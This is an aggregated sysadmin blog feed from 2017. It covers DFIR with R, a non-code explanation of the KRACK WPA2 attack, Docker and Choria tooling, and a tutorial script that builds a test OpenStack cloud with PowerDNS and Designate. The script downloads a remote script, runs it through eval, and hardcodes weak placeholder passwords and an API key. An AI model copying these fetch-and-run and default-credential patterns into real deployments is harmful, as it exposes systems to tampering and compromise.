There are cluster of emotionally neutral retweets, two positive retweets, and a load of negative retweets. This type of analysis can quickly lead to a good feel for the overall sentiment of an attacker collective, particularly one with less opsec and more desire for attention via social media.
In Part 2 of DFIR Redefined: Deeper Functionality for Investigators with R we'll explore this scenario further via sentiment analysis and Twitter data, as well as Fast Frugal Trees (decision trees) for prioritizing criticality.
Let me know if you have any questions on the first part of this series via @holisticinfosec or russ at holisticinfosec dot org.
Cheers...until next time. 

by Russ McRee (noreply@blogger.com) at October 18, 2017 04:14 AM

OpenSSL

More China Press Coverage

Press Coverage

There have been more articles written based on the interviews with Paul Yang from BaishanCloud, Tim Hudson, and Steve Marquess from the OpenSSL team.

These join the articles noted in the previous blog entry.

October 18, 2017 01:00 AM

October 17, 2017

The Lone Sysadmin

Advice On Downgrading Adobe Flash

VMware has a KB article out (linked below) about the Adobe Flash crashes that happen if you’re running the latest version of Flash (27.0.0.170). A lot of us were caught off guard recently when our PCs updated themselves and we couldn’t get into our VMware vSphere environments. The VMware KB article suggests downgrading your Flash […]

The post Advice On Downgrading Adobe Flash appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at October 17, 2017 03:59 PM

October 16, 2017

ma.ttias.be

Compile PHP from source: error: utf8_mime2text() has new signature

The post Compile PHP from source: error: utf8_mime2text() has new signature appeared first on ma.ttias.be.

It's been a while, but I had to recompile a PHP from source and ran into this problem during the ./configure stage.

$ ./configure
...
checking for IMAP Kerberos support... no
checking for IMAP SSL support... yes
checking for utf8_mime2text signature... new
checking for U8T_DECOMPOSE...
configure: error: utf8_mime2text() has new signature, but U8T_CANONICAL is missing.
This should not happen. Check config.log for additional information.

To resolve that utf8_mime2text() has new signature, but U8T_CANONICAL is missing error, on CentOS you can install the libc-client-devel package.

$ yum install libc-client-devel

After that, your ./configure should go through.

The post Compile PHP from source: error: utf8_mime2text() has new signature appeared first on ma.ttias.be.

by Mattias Geniar at October 16, 2017 08:30 PM

Cryptography Engineering

Falling through the KRACKs

The big news in crypto today is the KRACK attack on WPA2 protected WiFi networks. Discovered by Mathy Vanhoef and Frank Piessens at KU Leuven, KRACK (Key Reinstallation Attack) leverages a vulnerability in the 802.11i four-way handshake in order to facilitate decryption and forgery attacks on encrypted WiFi traffic.

The paper is here. It’s pretty easy to read, and you should.

I don’t want to spend much time talking about KRACK itself, because the vulnerability is pretty straightforward. Instead, I want to talk about why this vulnerability continues to exist so many years after WPA was standardized. And separately, to answer a question: how did this attack slip through, despite the fact that the 802.11i handshake was formally proven secure?

A quick TL;DR on KRACK

For a detailed description of the attack, see the KRACK website or the paper itself. Here I’ll just give a brief, high level description.

The 802.11i protocol (also known as WPA2) includes two separate mechanisms to ensure the confidentiality and integrity of your data. The first is a record layer that encrypts WiFi frames, to ensure that they can’t be read or tampered with. This encryption is (generally) implemented using AES in CCM mode, although there are newer implementations that use GCM mode, and older ones that use RC4-TKIP (we’ll skip these for the moment.)

The key thing to know is that AES-CCM (and GCM, and TKIP) is a stream cipher, which means it’s vulnerable to attacks that re-use the same key and “nonce”, also known as an initialization vector. 802.11i deals with this by constructing the initialization vector using a “packet number” counter, which initializes to zero after you start a session, and always increments (up to 2^48, at which point rekeying must occur). This should prevent any nonce re-use, provided that the packet number counter can never be reset.

The second mechanism you should know about is the “four way handshake” between the AP and a client (supplicant) that’s responsible for deriving the key to be used for encryption. The particular message KRACK cares about is message #3, which causes the new key to be “installed” (and used) by the client.

I’m a four-way handshake. Client is on the left, AP is in the right. (courtesy Wikipedia, used under CC).

The key vulnerability in KRACK (no pun intended) is that the acknowledgement to message #3 can be blocked by adversarial nasty people.* When this happens, the AP re-transmits this message, which causes (the same) key to be reinstalled into the client (note: see update below*). This doesn’t seem so bad. But as a side effect of installing the key, the packet number counters all get reset to zero. (And on some implementations like Android 6, the key gets set to zero — but that’s another discussion.)

The implication is that by forcing the AP to replay this message, an adversary can cause a connection to reset nonces and thus cause keystream re-use in the stream cipher. With a little cleverness, this can lead to full decryption of traffic streams. And that can lead to TCP hijacking attacks. (There are also direct traffic forgery attacks on GCM and TKIP, but this as far as we go for now.)

How did this get missed for so long?

If you’re looking for someone to blame, a good place to start is the IEEE. To be clear, I’m not referring to the (talented) engineers who designed 802.11i — they did a pretty good job under the circumstances. Instead, blame IEEE as an institution.

One of the problems with IEEE is that the standards are highly complex and get made via a closed-door process of private meetings. More importantly, even after the fact, they’re hard for ordinary security researchers to access. Go ahead and google for the IETF TLS or IPSec specifications — you’ll find detailed protocol documentation at the top of your Google results. Now go try to Google for the 802.11i standards. I wish you luck.

The IEEE has been making a few small steps to ease this problem, but they’re hyper-timid incrementalist bullshit. There’s an IEEE program called GET that allows researchers to access certain standards (including 802.11) for free, but only after they’ve been public for six months — coincidentally, about the same time it takes for vendors to bake them irrevocably into their hardware and software.

This whole process is dumb and — in this specific case — probably just cost industry tens of millions of dollars. It should stop.

The second problem is that the IEEE standards are poorly specified. As the KRACK paper points out, there is no formal description of the 802.11i handshake state machine. This means that implementers have to implement their code using scraps of pseudocode scattered around the standards document. It happens that this pseudocode leads to the broken implementation that enables KRACK. So that’s bad too.

And of course, the final problem is implementers. One of the truly terrible things about KRACK is that implementers of the WPA supplicant (particularly on Linux) managed to somehow make Lemon Pledge out of lemons. On Android 6 in particular, replaying message #3 actually sets an all-zero key. There’s an internal logic behind why this happens, but Oy Vey. Someone actually needs to look at this stuff.

What about the security proof?

The fascinating thing about the 802.11i handshake is that despite all of the roadblocks IEEE has thrown in people’s way, it (the handshake, at least) has been formally analyzed. At least, for some definition of the term.

(This isn’t me throwing shade — it’s a factual statement. In formal analysis, definitions really, really matter!)

A paper by He, Sundararajan, Datta, Derek and Mitchell (from 2005!) looked at the 802.11i handshake and tried to determine its security properties. What they determined is that yes, indeed, it did produce a secret and strong key, even when an attacker could tamper with and replay messages (under various assumptions). This is good, important work. The proof is hard to understand, but this is par for the course. It seems to be correct.

Representation of the 4-way handshake from the paper by He et al. Yes, I know you’re like “what?“. But that’s why people who do formal verification of protocols don’t have many friends.

Even better, there are other security proofs showing that — provided the nonces are never repeated — encryption modes like CCM and GCM are highly secure. This means that given a secure key, it should be possible to encrypt safely.

So what went wrong?

The critical problem is that while people looked closely at the two components — handshake and encryption protocol — in isolation, apparently nobody looked closely at the two components as they were connected together. I’m pretty sure there’s an entire geek meme about this.

Two unit tests, 0 integration tests, thanks Twitter.

Of course, the reason nobody looked closely at this stuff is that doing so is just plain hard. Protocols have an exponential number of possible cases to analyze, and we’re just about at the limit of the complexity of protocols that human beings can truly reason about, or that peer-reviewers can verify. The more pieces you add to the mix, the worse this problem gets.

In the end we all know that the answer is for humans to stop doing this work. We need machine-assisted verification of protocols, preferably tied to the actual source code that implements them. This would ensure that the protocol actually does what it says, and that implementers don’t further screw it up, thus invalidating the security proof.

This needs to be done urgently, but we’re so early in the process of figuring out how to do it that it’s not clear what it will take to make this stuff go live. All in all, this is an area that could use a lot more work. I hope I live to see it.

===

* Update: An early version of this post suggested that the attacker would replay the third message. This can indeed happen, and it does happen in some of the more sophisticated attacks. But primarily, the paper describes forcing the AP to resend it by blocking the acknowledgement from being received at the AP. Thanks to Nikita Borisov and Kyle Birkeland for the fix!


by Matthew Green at October 16, 2017 01:27 PM

October 14, 2017

Electricmonk.nl

Ansible-cmdb v1.23: Generate a host overview of Ansible facts.

I've just released ansible-cmdb v1.23. Ansible-cmdb takes the output of Ansible's fact gathering and converts it into a static HTML overview page containing system configuration information. It supports multiple templates (fancy html, txt, markdown, json and sql) and extending information gathered by Ansible with custom data.

This release includes the following changes:

  • group_vars are now parsed.
  • Sub directories in host_vars are now parsed.
  • Addition of a -q/--quiet switch to suppress warnings.
  • Minor bugfixes and additions.

As always, packages are available for Debian, Ubuntu, Redhat, Centos and other systems. Get the new release from the Github releases page.

by admin at October 14, 2017 09:33 AM

October 11, 2017

Steve Kemp's Blog

A busy week or two

It feels like the past week or two has been very busy, and so I'm looking forward to my "holiday" next month.

I'm not really having a holiday of course, my wife is slowly returning to work, so I'll be taking a month of paternity leave, taking sole care of Oiva for the month of November. He's still a little angel, and now that he's reached 10 months old he's starting to get much more mobile - he's on the verge of walking, but not quite there yet. Mostly that means he wants you to hold his hands so that he can stand up, swaying back and forth before the inevitable collapse.

Beyond spending most of my evenings taking care of him, from the moment I return from work to his bedtime (around 7:30PM), I've made the Debian Administration website both read-only and much simpler. In the past that site was powered by a lot of servers, I think around 11. Now it has only a small number of machines, which should slowly decrease.

I've ripped out the database host, the redis host, the events-server, the planet-machine, the email-box, etc. Now we have a much simpler setup:

  • Front-end machine
    • Directly serves the code site
    • Directly serves the SSL site which exists solely for Let's Encrypt
    • Runs HAProxy to route the rest of the requests to the cluster.
  • 4 x Apache servers
    • Each one has a (read-only) MySQL database on it for the content.
      • In case of future-compromise I removed all user passwords, and scrambled the email-addresses.
      • I don't think there's a huge risk, but better safe than sorry.
    • Each one runs the web-application.
      • Which now caches each generated page to /tmp/x/x/x/x/$hash if it doesn't exist.
      • If the request is cached it is served from that cache rather than dynamically.

Finally although I'm slowly making progress with "radio stuff" I've knocked up a simple hack which uses an ultrasonic sensor to determine whether I'm sat in front of my (home) PC. If I am everything is good. If I'm absent the music is stopped and the screen locked. Kinda neat.

(Simple ESP8266 device wired to the sensor. When the state changes a message is posted to Mosquitto, where a listener reacts to the change(s).)

Oh, not final. I've also transfered my mobile phone from DNA.fi to MoiMobile. Which should complete soon, right now my phone is in limbo, active on niether service. Oops.

October 11, 2017 09:00 PM

October 10, 2017

Sean's IT Blog

Nutanix Xtract for VMs #blogtober

One of the defining features of the Nutanix platform is simplicity.  Innovations like the Prism interface for infrastructure management and One-Click Upgrades for both the Nutanix software-defined storage platform and supported hypervisors have lowered the management burden of on-premises infrastructure.

Nutanix is now looking to bring that same level of simplicity to migrating virtual machines to a new hypervisor.  Nutanix has released a new tool today called Xtract for VM.  This tool, which is free to all Nutanix customers, brings the same one-click simplicity that Nutanix is known for to migrating workloads from ESXi to AHV.

So how does Xtract for VM differentiate from other migration tools?  First, it is an agentless migration tool.  Xtract will communicate with vCenter to get a list of VMs that are in the ESXi infrastructure, and it will build a migration plan and synchronize the VM data from ESXi to AHV.

During data synchronization and migration, Xtract will insert the AHV device drivers into the virtual machine.  It will also capture and preserve the network configuration, so the VM will not lose connectivity or require administrator intervention after the migration is complete.

By injecting the AHV drivers and preserving the network configuration during the data synchronization and cutover, Xtract is able to perform cross-hypervisor migrations with minimal downtime.  And since the original VM is not touched during the migration, rollback is as easy as shutting down the AHV VM and powering the ESXi VM back on, which significantly reduces the risk of cross-hypervisor migrations.

Analysis

The datacenter is clearly changing, and we now live in a multi-hypervisor world.  While many customers will still run VMware for their on-premises environments, there are many that are looking to reduce their spend on hypervisor products.  Xtract for VMs provides a tool to help reduce that cost while providing the simplicity that Nutanix is known for.

While Xtract is currently version 1.0, I can see this technology be a pivotal for helping customers move workloads between on-premises and cloud infrastructures.

To learn more about this new tool, you can check out the Xtract for VMs page on Nutanix’s webpage.


by seanpmassey at October 10, 2017 04:36 PM

October 09, 2017

Sarah Allen

getting started with docker

Learning about docker this weekend… it always is hard to find resources for people who understand the concepts of VMs and containers and need to dive into something just a little bit complicated. I had been through lots of intro tutorials, when docker first arrived on the scene, and was seeking to set up a hosted dev instance for existing open source project which already had a docker set up.

Here’s an outline of the key concepts:

  • docker-machine: commands to create and manage VMs, whether locally or on a remote server
  • docker: commands to talk to your active VM that is already set up with docker-machine
  • docker-compose: a way to create and manage multiple containers on a docker-machine

As happens, I see parallels between human spoken language and new technical terms, which makes sense since these are things made by and for humans. The folks who made Docker invented a kind of language for us to talk to their software.

I felt like I was learning to read in a new language, like pig-latin, where words have a prefix of docker, like some kind of honorific

They use docker- to speak to VMs locally or remotely, and docker (without a dash) is an intimate form of communication with your active VM

Writing notes here, so I remember when I pick this up again. If there are Docker experts reading this, I’d be interested to know if I got this right and if there are other patterns or naming conventions that might help fast-track my learning of this new dialect for deploying apps in this land of containers and virtual machines.

Also, if a kind and generous soul wants to help an open source project, I’ve written up my work-in-progress steps for setting up OpenOpps-platform dev instance and would appreciate any advice, and of course, would welcome a pull request.

by sarah at October 09, 2017 02:17 PM

R.I.Pienaar

The Choria Emulator

In my previous posts I discussed what goes into load testing a Choria network, what connections are made, subscriptions are made etc.

From this it’s obvious the things we should be able to emulate are:

  • Connections to NATS
  • Subscriptions – which implies number of agents and sub collectives
  • Message payload sizes

To make it realistically affordable to emulate many more machines that I have I made an emulator that can start numbers of Choria daemons on a single node.

I’ve been slowly rewriting MCollective daemon side in Go which means I already had all the networking and connectors available there, so a daemon was written:

usage: choria-emulator --instances=INSTANCES [<flags>]
 
Emulator for Choria Networks
 
Flags:
      --help                 Show context-sensitive help (also try --help-long and --help-man).
      --version              Show application version.
      --name=""              Instance name prefix
  -i, --instances=INSTANCES  Number of instances to start
  -a, --agents=1             Number of emulated agents to start
      --collectives=1        Number of emulated subcollectives to create
  -c, --config=CONFIG        Choria configuration file
      --tls                  Enable TLS on the NATS connections
      --verify               Enable TLS certificate verifications on the NATS connections
      --server=SERVER ...    NATS Server pool, specify multiple times (eg one:4222)
  -p, --http-port=8080       Port to listen for /debug/vars

You can see here it takes a number of instances, agents and collectives. The instances will all respond with ${name}-${instance} on any mco ping or RPC commands. It can be discovered using the normal mc discovery – though only supports agent and identity filters.

Every instance will be a Choria daemon with the exact same network connection and NATS subscriptions as real ones. Thus 50 000 emulated Choria will put the exact same load of work on your NATS brokers as would normal ones, performance wise even with high concurrency the emulator performs quite well – it’s many orders of magnitude faster than the ruby Choria client anyway so it’s real enough.

The agents they start are all copies of this one:

emulated0
=========
 
Choria Agent emulated by choria-emulator
 
      Author: R.I.Pienaar <rip@devco.net>
     Version: 0.0.1
     License: Apache-2.0
     Timeout: 120
   Home Page: http://choria.io
 
   Requires MCollective 2.9.0 or newer
 
ACTIONS:
========
   generate
 
   generate action:
   ----------------
       Generates random data of a given size
 
       INPUT:
           size:
              Description: Amount of text to generate
                   Prompt: Size
                     Type: integer
                 Optional: true
            Default Value: 20
 
 
       OUTPUT:
           message:
              Description: Generated Message
               Display As: Message

You can this has a basic data generator action – you give it a desired size and it makes you a message that size. It will run as many of these as you wish all called like emulated0 etc.

It has an mcollective agent that go with it, the idea is you create a pool of machines all with your normal mcollective on it and this agent. Using that agent then you build up a different new mcollective network comprising the emulators, federation and NATS.

Here’s some example of commands – you’ll see these later again when we talk about scenarios:

We download the dependencies onto all our nodes:

$ mco playbook run setup-prereqs.yaml --emulator_url=https://example.net/rip/choria-emulator-0.0.1 --gnatsd_url=https://example.net/rip/gnatsd --choria_url=https://example.net/rip/choria

We start NATS on our first node:

$ mco playbook run start-nats.yaml --monitor 8300 --port 4300 -I test1.example.net

We start the emulator with 1500 instances per node all pointing to our above NATS:

$ mco playbook run start-emulator.yaml --agents 10 --collectives 10 --instances 750 --monitor 8080 --servers 192.168.1.1:4300

You’ll then setup a client config for the built network and can interact with it using normal mco stuff and the test suite I’ll show later. Simularly there are playbooks to stop all the various parts etc. The playbooks just interact with the mcollective agent so you could use mco rpc directly too.

I found I can easily run 700 to 1000 instances on basic VMs – needs like 1.5GB RAM – so it’s fairly light. Using 400 nodes I managed to build a 300 000 node Choria network and could easily interact with it etc.

Finally I made a ec2 environment where you can stand up a Puppet Master, Choria, the emulator and everything you need and do load tests on your own dime. I was able to do many runs with 50 000 emulated nodes on EC2 and the whole lot cost me less than $20.

The code for this emulator is very much a work in progress as is the Go code for the Choria protocol and networking but the emulator is here if you want to take a peek.

by R.I. Pienaar at October 09, 2017 07:37 AM

Joe Topjian

Building OpenStack Environments Part 3

Introduction

Continuing on with the series of building disposable OpenStack environments for testing purposes, this part will cover how to install services which are not supported by PackStack.

While PackStack does an amazing job at easily and quickly creating OpenStack environments, it only has the ability to install a subset of services under the OpenStack umbrella. However, almost all OpenStack services are supported by RDO, the overarching package library for RedHat/CentOS.

For this part in the series, I will show how to install and configure Designate, the OpenStack DNS service, using the RDO packages.

Planning the Installation

PackStack spoils us by hiding all of the steps required to install an OpenStack service. Installing a service requires a good amount of planning, even if the service is only going to be used for testing rather than production.

To begin planning, first read over any documentation you can find about the service in question. For Designate, there is a good amount of documentation here.

The overview page shows that there are a lot of moving pieces to Designate. Whether or not you need to account for all of these is still in question since it's possible that the RDO packages provide some sort of base configuration.

The installation page gives some brief steps about how to install Designate. By reading the page, you can see that all of the services listed in the Overview do not require special configuration. This makes things more simple.

Keep in mind that if you were to deploy Designate for production use, you might have to tune all of these services to suit your environment. Determining how to tune these services is out of scope for this blog post. Usually it requires careful reading of the various Designate configuration files, looking for supplementary information on mailing lists, and often even reading the source code itself.

The installation page shows how to use BIND as the default DNS driver. However, I'm going to change things up here. Instead, I will show how to use PowerDNS. There are two reasons for this:

  1. I'm allergic to BIND.
  2. I had trouble piecing together everything required to run Designate with the new PowerDNS driver, so this will also serve as documentation to help others.

Adding the Installation Steps

Continuing with Part 1 and Part 2, you should have a directory called terraform-openstack-test on your workstation. The structure of the directory should look something like this:

$ pwd
/home/jtopjian/terraform-openstack-test
$ tree .
.
├── files
│   └── deploy.sh
├── key
│   ├── id_rsa
│   └── id_rsa.pub
├── main.tf
└── packer
    ├── files
    │   ├── deploy.sh
    │   ├── packstack-answers.txt
    │   └── rc.local
    └── openstack
        ├── build.json
        └── main.tf

deploy.sh is used to install and configure PackStack and then strip any unique information from the installation. Packer then makes an image out of this installation. Finally, rc.local does some post-boot configuration.

To install and configure Designate, you will want to add additional pieces to both deploy.sh and rc.local.

Installing PowerDNS

First, install and configure PowerDNS. To do this, add the following to deploy.sh:

  hostnamectl set-hostname localhost

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

+ mysql -e "CREATE DATABASE pdns default character set utf8 default collate utf8_general_ci"
+ mysql -e "GRANT ALL PRIVILEGES ON pdns.* TO 'pdns'@'localhost' IDENTIFIED BY 'password'"
+
+ yum install -y epel-release yum-plugin-priorities
+ curl -o /etc/yum.repos.d/powerdns-auth-40.repo https://repo.powerdns.com/repo-files/centos-auth-40.repo
+ yum install -y pdns pdns-backend-mysql
+
+ echo "daemon=no
+ allow-recursion=127.0.0.1
+ config-dir=/etc/powerdns
+ daemon=yes
+ disable-axfr=no
+ guardian=yes
+ local-address=0.0.0.0
+ local-ipv6=::
+ local-port=53
+ setgid=pdns
+ setuid=pdns
+ slave=yes
+ socket-dir=/var/run
+ version-string=powerdns
+ out-of-zone-additional-processing=no
+ webserver=yes
+ api=yes
+ api-key=someapikey
+ launch=gmysql
+ gmysql-host=127.0.0.1
+ gmysql-user=pdns
+ gmysql-dbname=pdns
+ gmysql-password=password" | tee /etc/pdns/pdns.conf
+
+ mysql pdns < /home/centos/files/pdns.sql
+ sudo systemctl restart pdns

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

  systemctl stop openstack-cinder-backup.service
  systemctl stop openstack-cinder-scheduler.service
  systemctl stop openstack-cinder-volume.service
  systemctl stop openstack-nova-cert.service
  systemctl stop openstack-nova-compute.service
  systemctl stop openstack-nova-conductor.service
  systemctl stop openstack-nova-consoleauth.service
  systemctl stop openstack-nova-novncproxy.service
  systemctl stop openstack-nova-scheduler.service
  systemctl stop neutron-dhcp-agent.service
  systemctl stop neutron-l3-agent.service
  systemctl stop neutron-lbaasv2-agent.service
  systemctl stop neutron-metadata-agent.service
  systemctl stop neutron-openvswitch-agent.service
  systemctl stop neutron-metering-agent.service

  mysql -e "update services set deleted_at=now(), deleted=id" cinder
  mysql -e "update services set deleted_at=now(), deleted=id" nova
  mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
  for i in $(openstack network agent list -c ID -f value); do
    neutron agent-delete $i
  done

  systemctl stop httpd

  cp /home/centos/files/rc.local /etc
  chmod +x /etc/rc.local

There are four things begin done above:

  1. A MySQL database is created for PowerDNS.
  2. PowerDNS is then installed.
  3. A configuration file is created.
  4. A database schema is imported into the PowerDNS database.

You'll notice the schema is located in a file titled files/pdns.sql. Add the following to terraform-openstack-test/packer/files/pdns.sql:

CREATE TABLE domains (
  id                    INT AUTO_INCREMENT,
  name                  VARCHAR(255) NOT NULL,
  master                VARCHAR(128) DEFAULT NULL,
  last_check            INT DEFAULT NULL,
  type                  VARCHAR(6) NOT NULL,
  notified_serial       INT DEFAULT NULL,
  account               VARCHAR(40) DEFAULT NULL,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE UNIQUE INDEX name_index ON domains(name);


CREATE TABLE records (
  id                    BIGINT AUTO_INCREMENT,
  domain_id             INT DEFAULT NULL,
  name                  VARCHAR(255) DEFAULT NULL,
  type                  VARCHAR(10) DEFAULT NULL,
  content               VARCHAR(64000) DEFAULT NULL,
  ttl                   INT DEFAULT NULL,
  prio                  INT DEFAULT NULL,
  change_date           INT DEFAULT NULL,
  disabled              TINYINT(1) DEFAULT 0,
  ordername             VARCHAR(255) BINARY DEFAULT NULL,
  auth                  TINYINT(1) DEFAULT 1,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE INDEX nametype_index ON records(name,type);
CREATE INDEX domain_id ON records(domain_id);
CREATE INDEX recordorder ON records (domain_id, ordername);


CREATE TABLE supermasters (
  ip                    VARCHAR(64) NOT NULL,
  nameserver            VARCHAR(255) NOT NULL,
  account               VARCHAR(40) NOT NULL,
  PRIMARY KEY (ip, nameserver)
) Engine=InnoDB;


CREATE TABLE comments (
  id                    INT AUTO_INCREMENT,
  domain_id             INT NOT NULL,
  name                  VARCHAR(255) NOT NULL,
  type                  VARCHAR(10) NOT NULL,
  modified_at           INT NOT NULL,
  account               VARCHAR(40) NOT NULL,
  comment               VARCHAR(64000) NOT NULL,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE INDEX comments_domain_id_idx ON comments (domain_id);
CREATE INDEX comments_name_type_idx ON comments (name, type);
CREATE INDEX comments_order_idx ON comments (domain_id, modified_at);


CREATE TABLE domainmetadata (
  id                    INT AUTO_INCREMENT,
  domain_id             INT NOT NULL,
  kind                  VARCHAR(32),
  content               TEXT,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE INDEX domainmetadata_idx ON domainmetadata (domain_id, kind);


CREATE TABLE cryptokeys (
  id                    INT AUTO_INCREMENT,
  domain_id             INT NOT NULL,
  flags                 INT NOT NULL,
  active                BOOL,
  content               TEXT,
  PRIMARY KEY(id)
) Engine=InnoDB;

CREATE INDEX domainidindex ON cryptokeys(domain_id);


CREATE TABLE tsigkeys (
  id                    INT AUTO_INCREMENT,
  name                  VARCHAR(255),
  algorithm             VARCHAR(50),
  secret                VARCHAR(255),
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE UNIQUE INDEX namealgoindex ON tsigkeys(name, algorithm);

Installing Designate

Now that deploy.sh will install and configure PowerDNS, add the steps to install and configure Designate:

  hostnamectl set-hostname localhost

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  mysql -e "CREATE DATABASE pdns default character set utf8 default collate utf8_general_ci"
  mysql -e "GRANT ALL PRIVILEGES ON pdns.* TO 'pdns'@'localhost' IDENTIFIED BY 'password'"

  yum install -y epel-release yum-plugin-priorities
  curl -o /etc/yum.repos.d/powerdns-auth-40.repo https://repo.powerdns.com/repo-files/centos-auth-40.repo
  yum install -y pdns pdns-backend-mysql

  echo "daemon=no
  allow-recursion=127.0.0.1
  config-dir=/etc/powerdns
  daemon=yes
  disable-axfr=no
  guardian=yes
  local-address=0.0.0.0
  local-ipv6=::
  local-port=53
  setgid=pdns
  setuid=pdns
  slave=yes
  socket-dir=/var/run
  version-string=powerdns
  out-of-zone-additional-processing=no
  webserver=yes
  api=yes
  api-key=someapikey
  launch=gmysql
  gmysql-host=127.0.0.1
  gmysql-user=pdns
  gmysql-dbname=pdns
  gmysql-password=password" | tee /etc/pdns/pdns.conf

  mysql pdns < /home/centos/files/pdns.sql
  sudo systemctl restart pdns

+ openstack user create --domain default --password password designate
